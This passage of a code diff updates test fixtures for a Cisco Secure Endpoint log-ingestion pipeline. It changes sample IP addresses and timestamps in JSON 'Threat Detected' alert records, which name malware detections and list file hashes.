Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index 906c5f988fb..2faff34a516 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -24,7 +24,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -34,8 +34,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174499815Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337040100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -57,7 +57,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -104,7 +104,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -118,8 +118,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174504805Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337047700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -141,7 +141,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -188,7 +188,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -202,8 +202,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174507048Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337053100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -225,7 +225,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -272,7 +272,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -286,8 +286,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174509121Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337059300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -309,7 +309,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -356,7 +356,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -370,8 +370,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174511245Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337064100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -393,7 +393,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -440,7 +440,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -454,8 +454,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174513313Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 